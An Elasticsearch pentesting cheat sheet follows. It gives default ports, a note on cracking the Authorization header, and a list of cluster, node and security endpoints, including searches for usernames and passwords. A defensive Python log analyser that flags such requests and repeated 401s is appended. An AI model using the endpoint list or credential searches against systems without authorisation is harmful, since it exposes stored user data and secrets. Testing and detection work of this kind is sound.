Elasticsearch Pentesting
Elasticsearch is a search engine based on the Lucene library. Its default ports are 9200 and 9300.
Default Credentials
Brute Force Credentials
Crack the "Authorization" header in the web page.
Common Directories
/_cat/
/_cat/indices
/_cluster/
/_nodes/
/_remote/
/_security
/_search?q=username
/_search?q=password
/_security/role
/_security/user
/_xpack/security/user/
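Detection side of the endpoint list and the brute-force note above, as an added example that is not part of the original page: it flags requests to those paths and sources with repeated 401 responses in access logs. The log format (a reverse proxy in front of port 9200), the threshold, the function names and the sample lines are assumptions made for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints from the list above, matched as whole path prefixes.
SENSITIVE_PREFIXES = ("/_cat", "/_cluster", "/_nodes", "/_remote",
                      "/_security", "/_xpack/security")
CRED_TERMS = ("username", "password")  # the /_search?q=... terms above
BRUTE_FORCE_401S = 3                   # assumed threshold, tune per site

# Assumed log format: common-log-style lines from a proxy in front of 9200.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /_cat/indices HTTP/1.1" 200 512
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /_search?q=password HTTP/1.1" 200 2048
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET / HTTP/1.1" 401 90
198.51.100.9 - - [01/Jan/2024:10:01:01 +0000] "GET / HTTP/1.1" 401 90
198.51.100.9 - - [01/Jan/2024:10:01:02 +0000] "GET / HTTP/1.1" 401 90
192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /logs/_search?q=error HTTP/1.1" 200 300
203.0.113.7 - - [01/Jan/2024:10:03:00 +0000] "GET /_security/user HTTP/1.1" 401 90
"""

def classify(target):
    """Return a finding type for a request target, or None if unremarkable."""
    parts = urlsplit(target)
    path = parts.path.rstrip("/") or "/"
    if any(path == p or path.startswith(p + "/") for p in SENSITIVE_PREFIXES):
        return "enumeration"
    if path.endswith("/_search"):
        terms = " ".join(parse_qs(parts.query).get("q", [])).lower()
        if any(t in terms for t in CRED_TERMS):
            return "credential-search"
    return None

def analyze(log_text):
    """Return (findings, brute_force_sources) for proxy access-log text."""
    findings, failures = [], Counter()
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        status = int(m["status"])
        if status == 401:
            failures[m["ip"]] += 1  # missing or rejected credentials, per source
        kind = classify(m["target"])
        if kind:
            findings.append((m["ip"], kind, m["target"], status))
    brute = sorted(ip for ip, n in failures.items() if n >= BRUTE_FORCE_401S)
    return findings, brute
```

A finding with status 200 means the endpoint answered the request; the same path with 401 means authentication stopped it.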